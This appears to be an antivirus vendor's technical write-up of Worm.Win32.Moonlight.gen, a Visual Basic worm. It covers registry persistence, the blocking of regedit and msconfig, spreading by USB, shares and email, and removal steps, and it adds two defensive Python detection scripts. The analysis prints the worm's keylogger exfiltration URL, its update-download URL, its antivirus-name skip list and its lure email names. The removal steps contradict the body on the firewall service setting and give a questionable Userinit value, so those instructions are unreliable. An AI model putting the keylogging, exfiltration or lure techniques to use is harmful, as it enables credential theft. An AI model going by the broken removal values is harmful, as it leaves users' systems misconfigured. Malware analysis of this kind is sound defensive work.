Worm.Win32.Moonlight.gen

by alexander.adamov on May 14th, 2012 in Malware Descriptions.

Platform: Win32
Type: Worm
Size: 32768 bytes
Packer: PE_Patch, PECompact, PecBundle
Unpacked size: 123 KB
Language: Visual Basic
MD5: 5C58E370266F182E6507D2AEF55228E6
SHA1: E43C9BEFF365596525CD28DEBBC572761E4E71D5

Summary

The worm creates copies of itself on the local drives and shared network resources. It can also spread via email.

Technical Details

Installation

Once launched, the worm creates its copies on the system drive:

%USERPROFILE%\Templates\<folder_name_2>\service.exe
%USERPROFILE%\Templates\<folder_name_2>\winlogon.exe
%WinDir%\<folder_name_1>\EmangEloh.exe
%WinDir%\<folder_name_1>\smss.exe
%System%\<folder_name_3>\Z<rnd_1>cie.cmd
%WinDir%\sa-<rnd_2>.exe
%WinDir%\Ti<rnd_3>ta.exe
%WinDir%\<folder_name_1>\Ja<rnd_4>bLay.com
%System%\<rnd_1><rnd_3>l.exe
%USERPROFILE%\Templates\<folder_name_2>\Tux<folder_name_2>.exe

<folder_name_1>, <folder_name_2>, <folder_name_3> are random names (e.g. "M25727", "O63636Z", "X51334go"); <rnd_1>, <rnd_2>, <rnd_3>, <rnd_4> are random decimal numbers (e.g. 127387, 755277, 545063, 10242).

To ensure the malware automatically runs each time Windows is booted, the following registry keys are added:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"<rnd>" = "%System%\<rnd_1><rnd_3>l.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"<rnd>" = "%WinDir%\sa-<rnd_2>.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Common Startup" = "C:\WINDOWS\system32\<folder_name_3>"

[HKLM\System\CurrentControlSet\Control\SafeBoot]
"AlternateShell" = "<rnd_1><rnd_3>l.exe"

[HKLM\System\ControlSet002\Control\SafeBoot]
"AlternateShell" = "<rnd_1><rnd_3>l.exe"

In addition, these registry key values are modified:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"    = "explorer.exe, "%USERPROFILE%\Templates\<folder_name_2>\Tux<folder_name_2>.exe""
"Userinit" = "%System%\userinit.exe , "%WinDir%\<folder_name_1>\Ja<rnd_4>bLay.com""

The worm's copies are thus started by the "winlogon.exe" process through the Shell and Userinit values; because the SafeBoot "AlternateShell" values point to a copy as well, this happens even if Windows boots up in safe mode.

The worm then launches the copies with the following names:

service.exe
smss.exe
winlogon.exe
EmangEloh.exe

Payload

Once launched, the worm performs the following actions:

  • Removes registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Tok-Cirrhatus"
"AllMyBallance"
"MomentEverComes"
"Tok-Cirrhatus-1101"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"TryingToSpeak"
"YourUnintended"
"YourUnintendes"
"lexplorer"
"dkernel"
"Bron-Spizaetus-cgglmmrv"
"Bron-Spizaetus"
"Bron-Spizaetus-cfirltrx"
"ADie suka kamu"
"SaTRio ADie X"

Removing these values stops the programs they pointed to from starting automatically with Windows.

  • Stores its configuration data in the system registry keys:

[HKLM\Software\Microsoft\TUX\Path]
"1" = "<folder_name_1>"
"2" = "<folder_name_2>"
"3" = "<folder_name_2>"

<folder_name_1>, <folder_name_2>, <folder_name_3> are the random names of the folders in which the malware stores its copies (e.g. "M25727", "O63636Z", "X51334go").

[HKLM\Software\Microsoft\TUX\biang]
"1" = "<rnd_1>"
"2" = "<rnd_2>"
"3" = "<rnd_3>"
"4" = "<rnd_4>"
"5" = "<rnd_5>"

<rnd_1>, <rnd_2>, <rnd_3>, <rnd_4>, <rnd_5> are random decimal numbers the malware uses to give names to its copies (e.g.: 127387, 755277, 545063, 856821, 10242).

The following keys are also added to the registry:

[HKCU\Software\VB and VBA Program Settings\untukmu\version]

[HKCU\Software\VB and VBA Program Settings\noGods\appActive]

  • Modifies the registry key values:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState]
"FullPath" = "1"

As a result, the full path is displayed in Windows Explorer.

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"

The registry editor is blocked.

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt" = "1"

Extensions of registered file types are hidden.

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "0"
"ShowSuperHidden" = "0"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"UncheckedValue" = "0"

Files with the hidden and system attributes are not displayed in Windows Explorer.

[HKCR\scrfile]
"(Default)" = "File Folder"

As a result, files with the ".scr" extension are displayed as "File Folder", which makes the worm's .scr copies look like folders and so gets them launched when a user opens them.

[HKLM\System\CurrentControlSet\Services\SharedAccess]
"Start"    = "0"

Automatic start of the system firewall service is disabled.

  • Blocks launching the system utility "msconfig.exe" and the registry editor "regedit.exe" by adding the following registry keys (Windows starts the program named in the "debugger" value in place of the requested executable, so notepad.exe opens instead of either tool):

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]
"debugger" = "%WinDir%\notepad.exe"

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"debugger" = "%WinDir%\notepad.exe"

  • Hides its process by using the undocumented function "RegisterServiceProcess" if the infected computer runs Windows 9x.
  • Creates the following file to identify its presence in the system:

%WinDir%\[TheMoonlight].txt (109 bytes)

The file contains the following strings:

:: The NewMoonLight ::

Created by HeLLsPAwn A.K.A B4bb1cool

(c) 2006 Depok ~ Indonesia

  • Logs the user's keyboard events and sends the collected data as an HTTP request to the intruder's server:

http://www.apasajalah.host.sk/testms.php?mod=save&bkd=0&klog=<collected data>

  • Downloads an updated version of its executable file from the intruder's server using the following URL:

http://www.geocities.com/m00nL19ht2006/
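As an added example (not part of the original description), the following Python triage parses a "reg export" style dump and flags the settings listed above under Installation and Payload: the Winlogon "Shell" and "Userinit" hijack, the SafeBoot "AlternateShell" replacement, an Image File Execution Options "debugger" value, and the HKLM\Software\Microsoft\TUX configuration key. The .reg fragment is constructed sample data, and the folder names and numbers in it are made-up stand-ins for the placeholders above.

```python
import re

# Constructed .reg-format fragment ('reg export' style) carrying several of the
# indicators described above; sample data, not an export from a real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe, \"C:\\Documents and Settings\\bob\\Templates\\O63636Z\\TuxO63636Z.exe\""
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe , \"C:\\WINDOWS\\M25727\\Ja10242bLay.com\""
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="127387545063l.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"debugger"="C:\\WINDOWS\\notepad.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\TUX\biang]
"1"="127387"
'''

def parse_reg(text):
    """Return {key_path: {value_name: value}} (lower-cased names; REG_SZ and REG_DWORD only)."""
    keys, cur = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith('[') and line.endswith(']'):
            cur = line[1:-1].lower()
            keys[cur] = {}
        elif cur is not None and line[:1] == '"' and '=' in line:
            name, _, raw = line.partition('=')
            if raw.startswith('"'):            # REG_SZ: drop the quotes, unescape \" and \\
                keys[cur][name.strip('"').lower()] = re.sub(r'\\(.)', r'\1', raw[1:-1])
            elif raw.startswith('dword:'):     # REG_DWORD, written as 8 hex digits
                keys[cur][name.strip('"').lower()] = int(raw[6:], 16)
    return keys

def find_indicators(keys):
    """Flag the persistence and lockout settings this description attributes to the worm."""
    hits = []
    for path, v in keys.items():
        if path.endswith('\\currentversion\\winlogon'):
            if v.get('shell', 'explorer.exe').strip().lower() != 'explorer.exe':
                hits.append(('Winlogon Shell hijacked', v['shell']))
            # Userinit is a comma-separated list; anything besides userinit.exe is foreign
            parts = [p.strip(' "') for p in v.get('userinit', '').split(',') if p.strip()]
            if any(not p.lower().endswith('userinit.exe') for p in parts):
                hits.append(('Winlogon Userinit hijacked', v['userinit']))
        elif path.endswith('\\control\\safeboot') and v.get('alternateshell', 'cmd.exe').lower() != 'cmd.exe':
            hits.append(('SafeBoot AlternateShell replaced', v['alternateshell']))
        elif '\\image file execution options\\' in path and 'debugger' in v:
            hits.append(('IFEO debugger set for ' + path.rsplit('\\', 1)[1], v['debugger']))
        elif '\\software\\microsoft\\tux\\' in path:
            hits.append(('Worm configuration key present', path))
    return hits
```

Run it against a real export with `reg export HKLM hklm.reg` (the file is UTF-16; decode it before passing the text in), and review every hit by hand, since an IFEO debugger can also be a legitimate developer setting.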

Propagation

The worm copies its body to all portable storage devices connected to the infected computer. In the root directory of each infected disk, copies with the following names are created:

<current user name> Porn.exe
Data <current user name>.exe
Foto <current user name>.exe
New Folder(2).exe
New Folder.scr

In addition, the worm recursively searches through all the directories on the infected drive. It creates its copy with the following name in each found directory:

<name><61 space>.scr

where <name> is the name of the subdirectory.

The worm also spreads via shared network resources and peer-to-peer (P2P) file-sharing channels. It creates its copies in every folder on the infected computer whose name contains one of the following substrings:

download
upload
share

Names of the copies are picked up from the following list:

TutoriaL HAcking<61 space>.exe
Lagu – Server<61 space>.scr
Data DosenKu<61 space>.exe
Titip Folder Jangan DiHapus<61 space>.exe
Love Song<61 space>.scr
New mp3 BaraT !! <61 space>.exe
THe Best Ungu<61 space>.scr
Blink 182<61 space>.exe
Norman virus Control 5.18<61 space>.exe
Windows Vista setup<61 space>.scr
Gallery<61 space>.scr
RaHasIA<61 space>.exe
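As an added example (not part of the original description), the following Python scanner looks for the copy names described above: the root-directory names on removable disks, the "<name><61 space>.scr" copy placed in each subdirectory, and the padded names dropped into download/upload/share folders. It generalizes the last two patterns to any .exe or .scr whose stem ends in the 61-space run, rather than matching the listed names one by one. The directory tree it scans is a constructed fixture and the user name "bob" is an assumption.

```python
import os
import tempfile

PAD = ' ' * 61   # the 61-space run the worm inserts between the name and the real extension
ROOT_NAMES = {'New Folder.scr', 'New Folder(2).exe'}   # user-independent root-directory names

def suspicious_name(path, user):
    """Return why a file name matches one of the worm's copy patterns, or None if it does not."""
    parent, name = os.path.split(path)
    stem, ext = os.path.splitext(name)
    if ext.lower() not in ('.exe', '.scr'):
        return None
    if stem.endswith(PAD):                      # '<name><61 spaces>.scr' style copies
        if stem[:-len(PAD)] == os.path.basename(parent):
            return 'named after its own directory + 61 spaces'
        return 'extension hidden behind 61 spaces'
    if name in ROOT_NAMES or name in {f'{user} Porn.exe', f'Data {user}.exe', f'Foto {user}.exe'}:
        return 'known worm copy name'
    return None

def scan_tree(root, user):
    """Walk root and return [(relative_path, reason)] for every file matching a pattern."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            reason = suspicious_name(os.path.join(dirpath, f), user)
            if reason:
                hits.append((os.path.relpath(os.path.join(dirpath, f), root), reason))
    return sorted(hits)

def build_sample_tree():
    """Constructed fixture: worm-style names next to benign files, in a fresh temp directory."""
    root = tempfile.mkdtemp()
    for rel in ['Photos/Photos' + PAD + '.scr', 'Photos/holiday.jpg', 'Foto bob.exe',
                'New Folder.scr', 'share/Love Song' + PAD + '.scr', 'share/notes.txt', 'setup.exe']:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, 'wb').close()               # empty placeholder file; only the name matters
    return root

if __name__ == '__main__':
    for rel, why in scan_tree(build_sample_tree(), user='bob'):
        print(f'{rel!r}: {why}')
```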

The worm can also spread via email. It searches for email addresses in files with the following extensions:

txt
html
asp
wab
eml
doc
php
htm
rtf

Addresses whose names contain the following substrings are not used:

norman
norton
panda
mcafee
Syman
sophos
Trend
vaksin
novell
virus

The collected addresses are also used to derive SMTP server names: each address's domain name is appended to the following prefixes:

smtp.
mail.
ns1.
mx1.
mail1.
mx.
mxs.
relay.
gate.

When configuring the send process, the malware searches the infected computer for account information of the following email service providers:

Friendster
Yahoo!
Gmail
Hotmail

The following registry value is also read:

[HKLM\Software\Microsoft\Internet Account Manager\Accounts]
"SMTP Email Address"

The malware selects a name for the “From” field of the email being sent from the following list:

HackersMinds
JuwitaNingrum
Shit
BInaSarana
SaZZA
admin
Fria
Lia
HellSpawn
Emily
Anata
Titta
Davis
sasUK3
Rita
MooNLight
Jagung-Bakar
BabbyBear
CoolMan
12050075
Yoseph2000
mansonisme
jojo
SpawN
B4bb1cool

The email subject can be one from the following list:

Tolong Aku..
Tolong
hi please see this file
hey Indonesian porn Tiara lestari pic's
free screen saver romance for you
Please Visit Our Web Site moonLight.com>moonLight.com
please read again what i have written to you
thank's for you register your acount details are attached
Registration Confirmation
Cek This
hello
RE:bla bla bla
RE:HeLLO GuYs

The attached file contains a copy of the worm. The attachment name can be one of the following:

curriculum vittae.zip
USE_RAR_To_Extract.ace
ZIPPED.zip
FILEATTACH.bz2
Doc.gz
file.bz2
thisfile.gz
TITTA'S Picture.jar

Removal Recommendations

  1. Run a full scan of your computer using the antivirus program with an updated definition database (Download Ad-Aware Free).
  2. Do not launch EXE files and do not reboot your computer until the full scan is complete.
  3. Delete the registry keys (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "<rnd>" = "%System%\<rnd_1><rnd_3>l.exe"

    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "<rnd>" = "%WinDir%\sa-<rnd_2>.exe"

    [HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
    "Common Startup" = "C:\WINDOWS\system32\<folder_name_3>"

    [HKLM\System\CurrentControlSet\Control\SafeBoot]
    "AlternateShell" = "<rnd_1><rnd_3>l.exe"

    [HKLM\System\ControlSet002\Control\SafeBoot]
    "AlternateShell" = "<rnd_1><rnd_3>l.exe"

    [HKLM\Software\Microsoft\TUX\Path]
    "1" = "<folder_name_1>"
    "2" = "<folder_name_2>"
    "3" = "<folder_name_2>"

    [HKLM\Software\Microsoft\TUX\biang]
    "1" = "<rnd_1>"
    "2" = "<rnd_2>"
    "3" = "<rnd_3>"
    "4" = "<rnd_4>"
    "5" = "<rnd_5>"

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]
    "debugger" = "%WinDir%\notepad.exe"

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
    "debugger" = "%WinDir%\notepad.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools" = "1"

  4. Delete the registry branches (How to Work with System Registry):

    [HKCU\Software\VB and VBA Program Settings\untukmu\version]

    [HKCU\Software\VB and VBA Program Settings\noGods\appActive]

  5. Restore the registry key values (How to Work with System Registry):

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe"
    "Userinit" = "userinit.exe"

    [HKLM\System\CurrentControlSet\Services\SharedAccess]
    "Start" = "4"

  6. Delete the file:

    %WinDir%\[TheMoonlight].txt

  7. Clean the Temporary Internet Files folder, which contains infected files (How to clean Temporary Internet Files folder).